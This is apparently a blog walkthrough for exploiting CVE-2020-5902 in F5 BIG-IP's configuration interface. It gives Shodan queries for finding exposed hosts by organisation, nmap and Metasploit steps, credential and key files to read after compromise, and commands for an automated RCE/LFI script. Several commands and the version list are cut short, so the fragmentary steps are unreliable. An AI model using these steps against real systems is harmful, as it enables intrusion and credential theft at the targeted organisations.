# Disclaimer

For educational purposes only. This article is directed towards penetration testing and security research. The author does not claim any responsibility for the illegal use of provided knowledge.

# Overview

The Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.

# Vulnerable versions:

# BIG IP - Definition

BIG-IP is a family of products covering software and hardware designed around application availability, access control, and security solutions.�

  • BIG-IP Local Traffic Manager (LTM) - provides the platform for creating virtual servers, performance, service, protocol, authentication, and security profiles to define and shape your application traffic.

  • BIG-IP DNS - Distributes and secures DNS traffic, advertising your application namespaces.

# Impact - 9.8 Critical

This vulnerability allows for unauthenticated attackers, with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, disable services. This vulnerability may result in a complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.

Additional commentary: NVD Info & F5

# Basic exploitation structure

A following tmui login link manipulation allows an attacker to interact with tmshCmd.jsp and fileRead.jsp, respectively opening RCE and LFI attack possibilities.


# Discovering vulnerable systems

Method 1:
title:"Big-IP®" org:"Organization Name"

Method 2:
http.title:"BIG-IP®- Redirect" org:"Organization Name"

Additional filters:
country:"" - search by country
city:"" - search by city
net:"" Search based on an IP/CIDR
hostname:"" Locate devices by hostname
Script installation: 
cd /usr/share/nmap/scripts && wget

nmap --script=http-vuln-cve2020-5902.nse {IP}
# Add -p443 for faster output

# Metasploit module

Metasploit framework has published a public exploit for CVE-2020-5902 on July 5th. Note: Due to the novelty of the exploit, it is not recommended to use it. If you are willing to use it - do it responsibly, at your own risk.

Module installation:
cd /usr/share/metasploit-framework/modules/exploits/linux/http && wget

# Change f5_bigip_tmui_rce.rb permissions in case metasploit throws an error.

# Manual exploitation


# Useful command examples: whoami, uname, pwd
File Read:
# Files to look for: /etc/passwd, /etc/shadow, /home/$USER/.ssh/id_rsa, /config/bigip.conf

Directory listing:
# Directories to look at: /tmp, /home, /root

# Automatic exploitation

CVE-2020-5902 has already got an automated python script, allowing attackers to significantly reduce exploitation time.

Python script installation:
git clone

LFI - python3 -t -x lfr -f /etc/passwd
RCE - python3 -t -x rce -a whoami

# Personal thoughts

BIGIP CVE-2020-5902�is a fresh new thing that suddenly hit cybersecurity. Some people talk about its great significance, some are just trying to get easy bug bounty. But, in my opinion, this CVE is a product of hard work, which should be treated with respect and appropriately mitigated by web developers. I would like to thank all the awesome people who immediately started publishing about the exploit and spread some great awareness. Here is a small list of useful resources to continue monitoring the issue:

Last updated